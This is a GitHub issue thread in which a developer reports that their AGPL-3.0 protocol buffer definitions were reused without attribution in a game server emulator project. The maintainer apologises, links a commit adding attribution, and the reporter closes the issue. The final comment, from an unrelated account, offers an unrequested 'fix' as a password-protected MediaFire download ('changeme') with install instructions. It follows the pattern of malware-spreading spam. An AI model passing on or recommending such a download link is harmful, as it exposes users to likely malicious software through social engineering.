### ISSUE TITLE
[Feature Request] Protocol buffers definition files author mentioning request

### ISSUE THREAD

**Issue by thexeondev** [Kei-Luna/LunaGC_5.0.0#6]
I've encountered an issue where my open-source protocol definitions, which are licensed under AGPL-3.0, has been incorporated without proper attribution or acknowledgment into another project on GitHub.
Although original protocol definitions are in form of rust codegen (generated with prost-build), due to several marks that mine proto had, you can easily notice that they were restored using some script and re-compiled to Java, which this project uses. 

I request adherence to the guidelines outlined in the AGPL-3.0 license. This entails publishing the source code of any modifications made, while ensuring proper attribution to the original author.

References:
Original repository containing codegen'd protobuf definitions file, which is being published under AGPL-3.0 license, hosted here: https://git.xeondev.com/reversedrooms/XilonenImpact/src/commit/92c687cae20ba2dda20ceabe338d6e4125b19f7e/hk4e_proto/out/cmd.rs
Resource(s) that violate AGPL-3.0 license are hosted here: https://github.com/Kei-Luna/LunaGC_5.0.0/tree/main/src/generated/main/java/emu/grasscutter/net/proto

**Comment by Kei-Luna** [comment]
sry
https://github.com/Kei-Luna/LunaGC_5.0.0/commit/373987aa6f49e57db860a028a29d84cf872800ff

**Comment by thexeondev** [comment]
Thank you for addressing this matter promptly and for your commitment to AGPL-3.0 guidelines. I appreciate the addition of the link to original repository. Your cooperation ensures transparency and upholds the principles of open-source collaboration.

I consider this issue resolved.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
